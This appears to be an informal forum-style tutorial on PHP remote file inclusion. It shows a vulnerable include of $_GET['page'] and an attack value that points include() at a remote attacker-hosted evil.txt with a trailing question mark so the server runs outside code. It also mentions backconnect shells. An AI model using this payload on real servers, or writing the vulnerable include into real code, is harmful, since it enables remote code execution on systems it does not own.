This also called RFI, its where the attacker tries to inject his own php code inside your php app. If an attacker is able to hit this then he could be able to execute any kind of code he wishes to on this webserver.
In a simple example, if the site is trying to do something like page=page.html to work out which page should be displayed, the code may look something like this:
$file =$_GET['page']; //The page we wish to display
If this vulnerability is experienced, this means the intruder can try to make the the code to try and run and pass down to the eg like this.
So the vulnerable server will try to execute:
$file ="http://www.h4x3r.co.ke/evil.txt?"; //$_GET['page'];
include($file); //$file is the attackers script
So the intruder has this executed. As u can see the attack script is having a .txt but we do put a question mark behind so as to be passed to the vulnerable website. Also we cant use a .php extension due to that we dont want the script to be executed on the attack machine.
This is the basic part on how to do it, u can google for more and advanced steps to undertake these attack, how to bypass restrictions and other ways like backconnecting and binding to the server remote shell interaction. Although this kind of attacks is dieing, u will still find it in alot of servers out there due to careless programming and luck of security audits on these servers. Also admins are to blame due to that they arent aware of how hacks are done and are new to these methods intruders use to pick gates, jump in and scroll in the server
Peace to all,
All the best